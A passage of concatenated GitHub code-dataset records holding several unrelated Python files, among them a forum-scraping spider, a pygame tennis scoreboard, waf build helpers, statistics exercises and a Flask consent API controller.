= 1\nHASHING_WRONG_HASH = 2\nCHECK_NO_OPTIONS = 3\nMHLFILE_INCORRECT_INPUT = 4\nMHLHASH_CORRECT_OPTIONS = 5\nMHLFILE_FILE_INPUT = 6\nMHLFILE_CORRECT_OPTIONS = 7\nINCORRECT_OPTIONS = 8\nFILE_PATHS = 9\nABSOLUTE_FILE_PATHS = 10\nLONG_NAMES = 11\nNON_ASCII_TEST = 12\nMHL_CHARSETS_TEST = 13\nSEQUENCES_TEST = 14\nBIG_FILES_TEST = 15\nMANY_FILES_TEST = 16\nMHLFILE_MULTIPLE_OUTDIR = 17\nMHLFILE_BASIC = 18\nRECURSIVE_DIR_PROCESS = 19\n\nscen_defs = {\n\"Deleted last bytes\": HASHING_WRONG_SIZE,\n\"Change last bytes\": HASHING_WRONG_HASH,\n\"No options in a given command\": CHECK_NO_OPTIONS,\n\"mhlfile: correct options and incorrect input\": MHLFILE_INCORRECT_INPUT,\n\"mhlhash: correct options in different order\": MHLHASH_CORRECT_OPTIONS,\n\"mhlfile: input from file\": MHLFILE_FILE_INPUT,\n\"mhlfile: correct options in different order\": MHLFILE_CORRECT_OPTIONS,\n\"mhlfile: multiple '--output-folder' specification\": MHLFILE_MULTIPLE_OUTDIR,\n\"mhlhash: recursive directory calculate\": RECURSIVE_DIR_PROCESS,\n\"mhlseal and mhlverify: recursive directory and multiple '-o' testing\": MHLFILE_MULTIPLE_OUTDIR,\n\"Incorrect options\": INCORRECT_OPTIONS,\n\"Test for mhl file\": MHLFILE_BASIC,\n\"Test for mhl seal\": MHLFILE_BASIC,\n\"mhl hash and file: Files and folders paths and asterisk\": FILE_PATHS,\n\"mhl seal and verify: Files and folders paths and asterisk\": FILE_PATHS,\n\"mhl hash and file: Absolute filepaths\": ABSOLUTE_FILE_PATHS,\n\"mhl seal and verify: Absolute filepaths\": ABSOLUTE_FILE_PATHS,\n\"Long file name, directory name, MHL file name\": LONG_NAMES,\n\"Only non-ASCII characters in filepaths, system default NFC & NFD\": NON_ASCII_TEST,\n\"relative test non-ASCII characters in filepaths, system default NFC & NFD\": RECURSIVE_DIR_PROCESS,\n\"Mixed ASCII and non-ASCII characters in filepaths NFC\": NON_ASCII_TEST,\n\"Mixed ASCII and non-ASCII characters in filepaths NFD\": NON_ASCII_TEST,\n\"Non-ASCII European characters in filepaths NFC\": NON_ASCII_TEST,\n\"Non-ASCII European characters in filepaths NFD\": NON_ASCII_TEST,\n\"mhlhash: different encodings in MHL file\": MHL_CHARSETS_TEST,\n\"mhlsign: different encodings in MHL file\": MHL_CHARSETS_TEST,\n\"Sequences parsing failure\": SEQUENCES_TEST,\n\"Gaps in sequences failure\": SEQUENCES_TEST,\n\"Success work with sequences\": SEQUENCES_TEST,\n\"Absolute test for file sizes 2Gb +2b, 4Gb +2b, 8Gb +2b\": BIG_FILES_TEST,\n\"Relative test for big files\": BIG_FILES_TEST,\n\"mhlhash: work with large number of files\": MANY_FILES_TEST,\n\"Work with large number of files\": MANY_FILES_TEST\n}\n\ndef get_test_case_id(name):\n scen_id = scen_defs[name]\n return scen_id\n# return 0\n","repo_name":"pomfort/mhl-tool","sub_path":"tests/features/test_consistency.py","file_name":"test_consistency.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"61"} +{"seq_id":"23571000221","text":"\n\ndef calcLs(stallList, currDex):\n for num in range(1, len(stallList)):\n if stallList[num] == currDex:\n return stallList[num] - stallList[num - 1] - 1\n\ndef calcRs(stallList, currDex):\n for num in range(len(stallList) - 1, 0, -1):\n if stallList[num] == currDex:\n return stallList[num + 1] - stallList[num] - 1\n\ndef findGap(stallList):\n maxGap = - 1\n start, end = 0, 0\n for i in range(len(stallList) - 1):\n if stallList[i + 1] - stallList[i] > maxGap:\n start = stallList[i]\n end = stallList[i + 1]\n maxGap = end - start\n return start, end\n\ndef play(listSize, numPeople):\n # if numPeople == 1: return listSize // 2, listSize // 2 - 1\n # elif numPeople > (listSize // 2 + 1): return 0, 0\n\n stallList = [0, listSize + 1]\n start, end = 0, listSize + 1\n for num in range(numPeople - 1):\n stallList.append((end - start) // 2 + start)\n stallList = sorted(stallList)\n start, end = findGap(stallList)\n\n lastPersonDex = (end - start) // 2 + start\n stallList.append(lastPersonDex)\n stallList = sorted(stallList)\n\n Ls = calcLs(stallList, lastPersonDex)\n Rs = calcRs(stallList, lastPersonDex)\n\n return max(Ls, Rs), min(Ls, Rs)\n\n\n\nif __name__ == '__main__':\n inputName = \"smallBathroomOne.txt\"\n outputName = \"outputSmallBathroomOne(2).txt\"\n f = open(\"/Users/benhubsch/Dropbox/Side Projects/Google Code Jam/\" + inputName,'r')\n w = open(\"/Users/benhubsch/Dropbox/Side Projects/Google Code Jam/\" + outputName,'w')\n case = 0\n for line in f:\n if case != 0:\n arg1, arg2 = int(line.strip().split()[0]), int(line.strip().split()[1])\n maxOut, minOut = play(arg1, arg2)\n w.write(\"Case #\" + str(case) + \": \" + str(maxOut) + \" \"+ str(minOut) + \"\\n\")\n case += 1\n f.close()\n w.close()\n # print(play(3,1))\n\n\n\n# def initialize(stalls):\n# initial = [\"\"]*(stalls+2)\n# initial[0] = \"o\"\n# initial[len(initial) - 1] = \"o\"\n# return initial\n\n# def chooseStall(stallList, start, end):\n# chosenStall = (end - start) // 2 + start\n# stallList[chosenStall] = \"o\"\n# return stallList\n\n# def findGap(stallList):\n# dexO = []\n# for i in range(0, len(stallList)):\n# if stallList[i] == \"o\":\n# dexO.append(i)\n# maxGap = - 1\n# start, end = 0, 0\n# for num in range(0, len(dexO) - 1):\n# if dexO[num + 1] - dexO[num] > maxGap:\n# start = dexO[num]\n# end = dexO[num + 1]\n# maxGap = dexO[num + 1] - dexO[num]\n# return start, end\n\n# def play(listSize, numPeople):\n# stallList = initialize(listSize)\n# start, end = 0, len(stallList) - 1\n# for num in range(numPeople - 1):\n# stallList = chooseStall(stallList, start, end)\n# start, end = findGap(stallList)\n#\n# lastPersonDex = (end - start) // 2 + start\n# Ls = calcLs(stallList, lastPersonDex)\n# Rs = calcRs(stallList, lastPersonDex)\n# return max(Ls, Rs), min(Ls, Rs)\n\n\n\n\n\n# def initialize(stalls):\n# initial = [\"\"]*(stalls+2)\n# initial[0] = \"o\"\n# initial[len(initial) - 1] = \"o\"\n# return initial\n#\n# def calcLs(stallList, currDex):\n# for num in range(currDex, 0, -1):\n# if stallList[num] == \"o\":\n# return currDex - num - 1\n# return currDex - 1\n#\n# def calcRs(stallList, currDex):\n# for num in range(currDex, len(stallList)):\n# if stallList[num] == \"o\":\n# return num - currDex - 1\n# return len(stallList) - currDex - 2\n#\n# def playScenario(stallList, people):\n# for person in range(people):\n# personConsiderations = []\n# stallDex = []\n# for i in range(1, len(stallList) - 1):\n# if stallList[i] != \"o\":\n# Ls = calcLs(stallList, i)\n# Rs = calcRs(stallList, i)\n# personConsiderations.append([Ls, Rs])\n# stallDex.append(i)\n# minLsRs = -1\n# for consideration in personConsiderations:\n# if min(consideration) > minLsRs:\n# minLsRs = min(consideration)\n# maxes = []\n# maxDexes = []\n# for s in range(len(stallDex)):\n# if min(personConsiderations[s]) == minLsRs:\n# maxes.append(personConsiderations[s])\n# maxDexes.append(s)\n#\n# if len(maxes) == 1:\n# stallList[maxDexes[0]] == \"o\"\n# else:\n# maxLsRs = -1\n# for q in range(len(maxes)):\n# if (max(maxes[q]) > maxLsRs):\n# maxLsRs = maxes[q]\n# chosenStall = maxDexes[q]\n# stallList[chosenStall] = \"o\"\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2661.py","file_name":"2661.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27759340985","text":"import numpy as np\nimport csv\nfrom ClaseFlores import flores\nclass ManejadorFlores:\n __cantidad: 0\n __dimension: 0\n\n def __init__(self, dimension):\n self.__ListaFlores = np.empty(dimension, dtype=flores)\n self.__dimension = dimension\n self.__cantidad = 0\n #self.__ListaFlores=[]\n\n def __str__(self):\n s = \"\"\n for flores in self.__ListaFlores:\n s += str(flores) + '\\n'\n return s\n\n def crearFlor(self,unaFlor):\n if self.__cantidad == self.__dimension:\n self.__ListaFlores.resize(self.__dimension)\n self.__ListaFlores[self.__cantidad] = unaFlor\n self.__cantidad += 1\n\n def leerFlores(self):\n with open(\"flores.csv\",\"r\") as file:\n reader=csv.reader(file,delimiter=\";\")\n for fila in reader:\n numero = fila[0]\n nombre = fila[1]\n color = fila[2]\n descripcion = fila[3]\n unaFlor = flores(numero,nombre,color,descripcion)\n self.crearFlor(unaFlor)\n #reader = np.loadtxt(file, delimiter=\";\")\n\n \n","repo_name":"katherina-00/Unidad-3","sub_path":"ejercicio2/ClaseManejadorFlores.py","file_name":"ClaseManejadorFlores.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43107337671","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats\nfrom sklearn import datasets, linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\npath = \"./assets/Age_And_Time.csv\"\nageAndTimeDf = pd.read_csv(path)\npath = \"./assets/countries.csv\"\ncountriesDf = pd.read_csv(path)\n# a\nx = scipy.stats.norm.rvs(size=30, loc=5, scale=1)\nprint(x)\n# b\ny = 5 * x + 2\nprint(y)\n#c\ndef calcR(x,y):\n r=np.cov(x,y, ddof=0)[0][1]/(np.std(x, ddof=0)*np.std(y, ddof=0))\n\n return r\nr= calcR(x,y)\nprint(r)\n#d\ndef calcB(x,y,r):\n b=r*(np.std(y, ddof=0)/np.std(x, ddof=0))\n\n return b\nprint(calcB(x,y,r))\n\n#e\nnoise= scipy.stats.norm.rvs(loc=0, scale=1, size=30)\nnewY=y+noise\nr=calcR(x,newY)\nprint(r)\nprint(calcB(x,newY,r))\n\n#f\nnoises=np.linspace(0.5,10,100)\nrVector=[]\nbVector = []\nfor noise in noises:\n noise = scipy.stats.norm.rvs(loc=0, scale=noise, size=30)\n newY= y + noise\n r = calcR(x, newY)\n b=calcB(x, newY, r)\n rVector.append(r)\n bVector.append(b)\nprint (rVector)\nprint (bVector)\nplt.scatter(noises,rVector)\nplt.show()\nplt.scatter(noises,bVector)\nplt.show()\n","repo_name":"nivp9/statistics-4","sub_path":"Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4234626423","text":"import time\nimport requests\nimport os\nimport json\nimport re\nimport scrapy\nfrom math import ceil\nimport configparser\nfrom urllib.parse import urlencode\nfrom lxml.html import fromstring\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.crawler import CrawlerProcess\nfrom datetime import datetime, timedelta\nfrom scraper.base_scrapper import (\n SitemapSpider,\n SiteMapScrapper\n)\n\n\nclass SoqorSpider(SitemapSpider):\n name = 'soqor_spider'\n base_url = 'https://forums.soqor.net/'\n\n # Xpaths\n forum_xpath = '//a[@class=\"forum-title\"]/@href|'\\\n '//a[@class=\"subforum-title\"]/@href'\n thread_xpath = '//tr[contains(@class, \"topic-item \")]'\n thread_first_page_xpath = './/a[contains(@class,\"topic-title \")]/@href'\n thread_last_page_xpath = './/a[contains(@class,\"pagenav-last-button\")]/@href'\n thread_date_xpath = './/span[@class=\"post-date\"]/text()'\n pagination_xpath = '//a[contains(@class, \"pagenav-next-button\") '\\\n 'and not(contains(@class,\"h-hide\"))]/@href'\n thread_pagination_xpath = '//a[contains(@class,\"pagenav-current-button\")]'\\\n '/preceding-sibling::a[1]/@href'\n thread_page_xpath = '//a[contains(@class,\"pagenav-current-button\")]/text()'\n post_date_xpath = '//time[@itemprop=\"dateCreated\"]/@datetime'\n\n avatar_xpath = '//a[contains(@class,\"avatar--thread\")]/img/@src'\n\n # Regex stuffs\n avatar_name_pattern = re.compile(\n r\".*/(\\S+\\.\\w+)\",\n re.IGNORECASE\n )\n topic_pattern = re.compile(\n r'.*/(\\d+)-',\n re.IGNORECASE\n )\n\n # Other settings\n use_proxy = \"On\"\n sitemap_datetime_format = '%m-%d-%Y, %I:%M %p'\n post_datetime_format = '%Y-%m-%dT%H:%M:%S'\n\n def parse_thread_date(self, thread_date):\n thread_date = thread_date.strip().strip(',')\n days = None\n if 'ساعات' in thread_date.lower():\n # hours\n days = 0\n elif 'أسبوع' in thread_date.lower():\n # week\n days = 7\n elif 'يوم' in thread_date.lower():\n # days\n match = re.findall(r'\\d+', thread_date.lower())\n days = int(match[0])\n elif 'أسابيع' in thread_date.lower():\n # weeks\n match = re.findall(r'\\d+', thread_date.lower())\n days = int(match[0]) * 7\n if days is not None:\n return datetime.today() - timedelta(days=days)\n return datetime.strptime(\n thread_date,\n self.sitemap_datetime_format\n )\n\n def parse_post_date(self, post_date):\n post_date = post_date.strip().strip(',')\n days = None\n if 'ساعات' in post_date.lower():\n # hours\n days = 0\n elif 'أسبوع' in post_date.lower():\n # week\n days = 7\n elif 'يوم' in post_date.lower():\n # days\n match = re.findall(r'\\d+', post_date.lower())\n days = int(match[0])\n elif 'أسابيع' in post_date.lower():\n # weeks\n match = re.findall(r'\\d+', post_date.lower())\n days = int(match[0]) * 7\n if days is not None:\n return datetime.today() - timedelta(days=days)\n return datetime.strptime(\n post_date,\n self.post_datetime_format\n )\n\n def parse(self, response):\n # Synchronize user agent for cloudfare middleware\n self.synchronize_headers(response)\n\n # Load all forums\n all_forums = response.xpath(self.forum_xpath).extract()\n\n # update stats\n self.crawler.stats.set_value(\"mainlist/mainlist_count\", len(all_forums))\n\n for forum_url in all_forums:\n\n # Standardize url\n if self.base_url not in forum_url:\n forum_url = self.base_url + forum_url\n yield Request(\n url=forum_url,\n headers=self.headers,\n meta=self.synchronize_meta(response),\n callback=self.parse_forum\n )\n\n def parse_thread(self, response):\n\n # Synchronize cloudfare user agent\n self.synchronize_headers(response)\n\n # Check current page and last page\n current_page = response.xpath(self.thread_page_xpath).extract_first() or 1\n last_page = response.xpath(self.thread_last_page_xpath).extract_first()\n\n # Reverse scraping start here\n if int(current_page) == 1 and last_page:\n if self.base_url not in last_page:\n last_page = self.base_url + last_page\n yield Request(\n url=last_page,\n headers=self.headers,\n callback=super().parse_thread,\n meta=self.synchronize_meta(\n response,\n default_meta={\n \"topic_id\": response.meta.get(\"topic_id\")\n }\n )\n )\n\n # Save generic thread\n yield from super().parse_thread(response)\n\n # Save avatars\n yield from self.parse_avatars(response)\n\n def parse_avatars(self, response):\n\n # Synchronize headers user agent with cloudfare middleware\n self.synchronize_headers(response)\n\n # Save avatar content\n all_avatars = response.xpath(self.avatar_xpath).extract()\n for avatar_url in all_avatars:\n\n avatar_url = avatar_url.strip('.').split('..')[-1]\n\n # Standardize avatar url\n if not avatar_url.lower().startswith(\"http\"):\n avatar_url = self.base_url + avatar_url\n\n if 'image/svg' in avatar_url:\n continue\n\n file_name = self.get_avatar_file(avatar_url)\n\n if file_name is None:\n continue\n\n if os.path.exists(file_name):\n continue\n\n yield Request(\n url=avatar_url,\n headers=self.headers,\n callback=self.parse_avatar,\n meta=self.synchronize_meta(\n response,\n default_meta={\n \"file_name\": file_name\n }\n ),\n )\n\n\nclass SoqorScrapper(SiteMapScrapper):\n\n spider_class = SoqorSpider\n site_name = 'forums.soqor.net'\n site_type = 'forum'\n","repo_name":"ken2190/Enterprise-Forum-Scraper","sub_path":"scraper/soqor.py","file_name":"soqor.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4519220423","text":"import pygame as pg \r\nimport random\r\nimport sys\r\nfrom os import path\r\nfrom settings import *\r\nfrom player import *\r\n\r\n#TODO\r\n#Scoring + more\r\n\r\n#Input box class\r\nclass InputBox:\r\n def __init__(self, x, y, w, h, text=''):\r\n self.rect = pg.Rect(x, y, w, h)\r\n self.colour = RED\r\n self.text = text\r\n self.text_surface = FONT.render(text, True, self.colour)\r\n self.active = False\r\n\r\n def handle_event(self, event):\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n # If the user clicked on the input_box rect.\r\n if self.rect.collidepoint(event.pos):\r\n # Toggle the active variable.\r\n self.active = not self.active\r\n else:\r\n self.active = False\r\n # Change the current color of the input box.\r\n self.colour = BLUE if self.active else RED\r\n if event.type == pg.KEYDOWN:\r\n if self.active:\r\n if event.key == pg.K_RETURN:\r\n print(self.text)\r\n self.text = ''\r\n elif event.key == pg.K_BACKSPACE:\r\n self.text = self.text[:-1]\r\n else:\r\n self.text += event.unicode\r\n # Re-render the text.\r\n self.text_surface = FONT.render(self.text, True, self.colour)\r\n\r\n def update(self):\r\n # Resize the box if the text is too long.\r\n width = max(200, self.text_surface.get_width()+10)\r\n self.rect.w = width\r\n\r\n def draw(self, screen):\r\n # Blit the text.\r\n screen.blit(self.text_surface, (self.rect.x+5, self.rect.y+5))\r\n # Blit the rect.\r\n pg.draw.rect(screen, self.colour, self.rect, 2)\r\n\r\n\r\n#Game class\r\nclass Game:\r\n #Init function to start the game variables\r\n def __init__(self):\r\n pg.init()\r\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\r\n pg.display.set_caption(TITLE)\r\n self.clock = pg.time.Clock()\r\n pg.key.set_repeat(500,100)\r\n #self.screen_scenario = WELCOME\r\n self.load_data()\r\n self.Game_Deuce = False\r\n self.Game_Tiebreaker = False\r\n #self.Game_Winner = False\r\n self.sets = DEFAULT_SETS\r\n self.serve = random.choice([1,2])\r\n\r\n #Draw text function that takes: Text to display, Font of text, Size of text, Colour of text, x coord, y coord, alignment within text box\r\n def draw_text(self, text, font_name, size, colour, x, y, align = \"nw\"):\r\n font = pg.font.Font(font_name, size)\r\n text_surface = font.render(text, True, colour)\r\n text_rect = text_surface.get_rect()\r\n if align == \"nw\":\r\n text_rect.topleft = (x, y)\r\n if align == \"ne\":\r\n text_rect.topright = (x, y)\r\n if align == \"sw\":\r\n text_rect.bottomleft = (x, y)\r\n if align == \"se\":\r\n text_rect.bottomright = (x, y)\r\n if align == \"n\":\r\n text_rect.midtop = (x, y)\r\n if align == \"s\":\r\n text_rect.midbottom = (x, y)\r\n if align == \"e\":\r\n text_rect.midright = (x, y)\r\n if align == \"w\":\r\n text_rect.midleft = (x, y)\r\n if align == \"center\":\r\n text_rect.center = (x, y)\r\n self.screen.blit(text_surface, text_rect)\r\n \r\n #Path for all the files required for the game\r\n def load_data(self):\r\n game_folder = path.dirname(__file__)\r\n img_folder = path.join(game_folder, \"img\")\r\n music_folder = path.join(game_folder, \"music\")\r\n fonts_folder = path.join(game_folder, \"fonts\")\r\n\r\n self.title_font = path.join(fonts_folder, \"LemonMilk.otf\")\r\n self.hud_font = path.join(fonts_folder, \"Impacted2.0.ttf\")\r\n self.text_font = path.join(fonts_folder, \"CaviarDreams_Bold.ttf\")\r\n self.points_font = path.join(fonts_folder, \"scoreboard.ttf\")\r\n self.dim_screen = pg.Surface(self.screen.get_size()).convert_alpha()\r\n\r\n #Function to start a new game\r\n def new(self):\r\n self.paused = False\r\n self.screen.fill(DARKGREEN)\r\n self.player1 = Player(PLAYER1, 1, DEFAULT_SETS, self.Game_Deuce, self.Game_Tiebreaker, False)\r\n self.player2 = Player(PLAYER2, 0, DEFAULT_SETS, self.Game_Deuce, self.Game_Tiebreaker, False)\r\n\r\n def input_box_update(self):\r\n input_box1 = InputBox(100,100,140,32)\r\n input_box2 = InputBox(100,100,140,32)\r\n input_boxes = [input_box1, input_box2]\r\n done = False\r\n\r\n while not done:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n done = True\r\n for box in input_boxes:\r\n box.handle_event(event)\r\n\r\n for box in input_boxes:\r\n box.update()\r\n\r\n self.screen.fill((30, 30, 30))\r\n for box in input_boxes:\r\n box.draw(self.screen)\r\n #Function to run the scoreboard\r\n def run(self):\r\n self.playing = True\r\n #pg.mixer.music.play(loops=-1)\r\n #pg.mixer.music.set_volume(BG_MUSIC_VOLUME)\r\n while self.playing:\r\n self.dt = self.clock.tick(FPS) / 1000\r\n self.events()\r\n if not self.paused:\r\n self.update()\r\n self.draw()\r\n\r\n #Quit function\r\n def quit(self):\r\n pg.quit()\r\n sys.exit()\r\n\r\n #Update function that gets called in a loop to then call all the other functions that need to be run\r\n def update(self):\r\n self.check_state()\r\n\r\n def check_state(self):\r\n if self.player1.score == self.player2.score == 3:\r\n self.Game_Deuce = True\r\n self.player1.advantage = self.player1.disadvantage = self.player2.advantage = self.player2.disadvantage = False\r\n if self.player1.score == 4 and self.player2.score == 3:\r\n self.player1.advantage = self.player2.disadvantage = True\r\n if self.player1.score == 3 and self.player2.score == 4:\r\n self.player1.disadvantage = self.player2.advantage = True\r\n\r\n #Draw function to blit all the text and scores onto the screen\r\n def draw(self):\r\n #Points box No.1\r\n pg.draw.rect(self.screen, BLACK, (POINTS_BOX_X_1, POINTS_BOX_Y_1, POINTS_BOX_WIDTH, POINTS_BOX_HEIGHT))\r\n #Points box No.2\r\n pg.draw.rect(self.screen, BLACK, (POINTS_BOX_X_2, POINTS_BOX_Y_2, POINTS_BOX_WIDTH, POINTS_BOX_HEIGHT))\r\n \r\n #If for how many sets there are:\r\n if self.sets == 5:\r\n #Sets box No.1\r\n pg.draw.rect(self.screen, BLACK, (SETS_BOX_X, SETS_BOX_Y, SETS_BOX_WIDTH, SETS_BOX_HEIGHT)) \r\n #Sets box No.2\r\n pg.draw.rect(self.screen, BLACK, (SETS_BOX_X, SETS_BOX_Y - SETS_BOX_HEIGHT - SETS_BOX_OFFSET, SETS_BOX_WIDTH, SETS_BOX_HEIGHT)) \r\n\r\n #Text\r\n self.draw_text(\"The National Championships\", self.text_font, 80, WHITE, WIDTH/2, 551212, align = \"center\")\r\n self.draw_text(\"Points\", self.text_font, 40, WHITE, POINTS_BOX_X_1, POINTS_BOX_Y_2 - (5*POINTS_BOX_OFFSET), align=\"w\")\r\n\r\n #Points\r\n self.draw_text(str(POINTS[self.player1.score]), self.points_font, 180, YELLOW, POINTS_BOX_X_2, POINTS_BOX_Y_2)\r\n self.draw_text(str(POINTS[self.player2.score]), self.points_font, 180, YELLOW, POINTS_BOX_X_1, POINTS_BOX_Y_1)\r\n\r\n #Names\r\n self.draw_text(PLAYER1, self.text_font, 40, WHITE, POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET, POINTS_BOX_Y_2 + 20, align =\"w\")\r\n self.draw_text(PLAYER2, self.text_font, 40, WHITE, POINTS_BOX_X_1 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET, POINTS_BOX_Y_1 + 20, align =\"w\")\r\n\r\n #Server\r\n if self.serve == 1:\r\n self.screen.blit(SERVER_IMG, ((POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET),(POINTS_BOX_Y_2 + 50)))\r\n if self.serve == 2:\r\n self.screen.blit(SERVER_IMG, ((POINTS_BOX_X_2 + POINTS_BOX_WIDTH + POINTS_BOX_OFFSET),(POINTS_BOX_Y_1 + 50)))\r\n\r\n #Update the screen\r\n pg.display.flip()\r\n\r\n def events(self):\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.quit()\r\n if event.type == pg.KEYDOWN:\r\n #print(\"keypress\")\r\n if event.type == KILL_PROGRAM:\r\n self.quit()\r\n if event.key == PAUSE:\r\n self.paused = not self.paused\r\n if event.key == ADD_POINT_P1:\r\n self.player1.add_point()\r\n if self.player1.disadvantage or self.player2.disadvantage:\r\n self.player1.disadvantage = self.player2.disadvantage = False\r\n if event.key == ADD_POINT_P2:\r\n self.player2.add_point()\r\n\r\n def show_start_screen(self):\r\n self.screen.blit(MAIN_MENU_IMG, (0,0))\r\n self.draw_text(\"Welcome to the National Championships\", self.title_font, 60, WHITE, WIDTH/2, 60, align=\"center\")\r\n self.draw_text(\"Press any key to start setup process\", self.text_font, 45, WHITE, WIDTH/2, HEIGHT - 50, align=\"center\")\r\n pg.display.flip()\r\n self.wait_for_key()\r\n\r\n def show_setup_screen(self):\r\n self.screen.blit(SETUP_IMG, (0,0))\r\n self.draw_text(\"Enter names of Player 1 and Player 2\", self.scoreboard_font, 60, WHITE, WIDTH/2, 60, align = \"center\")\r\n pg.display.flip()\r\n self.wait.for_key()\r\n self.input_box_update()\r\n\r\n def wait_for_key(self):\r\n pg.event.wait()\r\n waiting = True\r\n while waiting:\r\n self.clock.tick(FPS)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n waiting = False\r\n self.quit()\r\n if event.type == pg.KEYUP:\r\n waiting = False\r\n\r\n#Create game object\r\ng = Game()\r\ng.show_start_screen()\r\n\r\nwhile True:\r\n g.new()\r\n g.run()\r\n","repo_name":"alexandrosjones/Tennis-Scoring","sub_path":"Tennis Umpire System/new scoring main.py","file_name":"new scoring main.py","file_ext":"py","file_size_in_byte":9910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5090608641","text":"import numpy as np \nimport torch as t\nimport torch.nn as nn \nimport torch.nn.functional as F\n\nclass Head(nn.Module):\n\tdef __init__(self, body: 'torch | object representing network body',\n\t\t\t\t\t output_actions: 'int | actions available'):\n\t\tsuper(Head, self).__init__()\n\t\tself._body = body\n\t\tself._output_actions = output_actions\n\n\t\tself._create_head()\n\n\tdef _create_head(self):\n\t\tself._network = nn.Sequential(nn.Linear(in_features=self._body._fc_hidden_layer_size, out_features=self._output_actions))\n\n\tdef forward(self, X):\n\t\tX = self._body(X)\n\t\treturn self._network(X).view(-1, self._output_actions)","repo_name":"atlashugs/dqn_pytorch","sub_path":"dqn/network_head.py","file_name":"network_head.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38754005821","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"All *basic* python related details\"\nfrom waflib.Context import Context\nfrom waflib.Tools import python as pytools # for correcting a bug\n\nfrom .._requirements import REQ as requirements\n\npytools.PYTHON_MODULE_TEMPLATE = '''\nimport os, pkg_resources\nNAME = '%s'\nvers = None\ntry:\n vers = pkg_resources.get_distribution(NAME).version\nexcept:\n try:\n current_module = __import__(NAME)\n vers = getattr(current_module, '__version__', None)\n\n if vers is None:\n vers = getattr(current_module, 'version', None)\n\n if vers is None:\n vers = __import__(NAME+'.version').version\n\n if vers is not None:\n vers = getattr(vers, '__version__', vers)\n except:\n import subprocess\n cmd = [\"conda\", \"list\", \"-f\", NAME]\n try:\n try:\n ret = subprocess.check_output(cmd)\n except FileNotFoundError:\n ret = subprocess.check_output(cmd, shell = True)\n out = ret.strip().split(b\"\\\\n\")\n if len(out) == 4:\n vers = next((i for i in out[-1].split(b\" \")[1:] if i != b\"\"), None)\n if vers is not None:\n vers = vers.decode('utf-8')\n except:\n pass\nprint('unknown version' if vers is None else str(vers))\n'''\n\ndef hascompiler(cnf:Context):\n \"whether the waf file mentions c++\"\n return cnf.env.CC_NAME or cnf.env.CXX_NAME\n\ndef store(cnf:Context, flg:str):\n \"store more python flags\"\n if hascompiler(cnf):\n for item in 'PYEXT', 'PYEMBED':\n cnf.parse_flags(flg, uselib_store=item)\n\ndef toload(_:Context):\n \"returns python features to be loaded\"\n return 'python' if 'python' in requirements else ''\n\n@requirements.addcheck\ndef check_python(cnf, _, version):\n \"checks the python version when necessary\"\n if 'PYTHON_VERSION' in cnf.env:\n return\n cnf.check_python_version(tuple(int(val) for val in str(version).split('.')))\n if hascompiler(cnf):\n cnf.check_python_headers()\n\n@requirements.addcheck\ndef check_python_default(cnf, name, version):\n \"Adds a default requirement checker\"\n cond = 'ver >= num('+str(version).replace('.',',')+')'\n cnf.check_python_module(name.replace(\"python-\", \"\"), condition = cond)\n","repo_name":"depixusgenome/wafbuilder","sub_path":"_python/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25231763184","text":"from flask import request, Blueprint\nfrom api.domain.consent import Consent\nfrom marshmallow import ValidationError\nfrom api.constant.message_code import MessageCode\nfrom api.schema.add_consent_schema import AddConsentSchema\nfrom api.exception.service_exception import ServiceException\nfrom api.business_logic.consent_service import ConsentService\nfrom api.util import exception_util, header_util, service_util\nfrom api.business_logic.data_field_service import DataFieldService\nfrom api.schema.inquiry_consent_schema import InquiryConsentSchema\n\nconsent = Blueprint('consent', __name__)\n\n\"\"\"\nAuthor : Neda Peyrone\nCreate Date : 05-09-2021\nFile : consent_controller.py\nPurpose : -\n\"\"\"\n\n\n@consent.route(\"/addConsent\", methods=['POST'])\ndef add_consent():\n payload = request.get_json()\n\n try:\n header = header_util.build_header(request.headers)\n\n validated_data = AddConsentSchema().load(payload)\n consent = Consent(**validated_data)\n\n ConsentService().add_consent(header, consent)\n DataFieldService().add_data_fields(\n header,\n consent.consent_code,\n consent.consent_version,\n consent.data_fields\n )\n return service_util.build_status_response(MessageCode.SUCCESS.name, MessageCode.SUCCESS.value)\n except (ValidationError, ServiceException) as err:\n return exception_util.handler(err)\n\n\n@consent.route(\"/getActiveConsents\", methods=['POST'])\ndef get_consents():\n try:\n consents = ConsentService().get_active_consents()\n data_field_service = DataFieldService()\n\n for idx, consent in enumerate(consents):\n data_fields = data_field_service.get_consent_data_fields(\n consent.consent_code, consent.consent_version)\n consents[idx].data_fields = data_fields\n\n return service_util.build_server_response(MessageCode.SUCCESS, consents)\n except (ValidationError, ServiceException) as 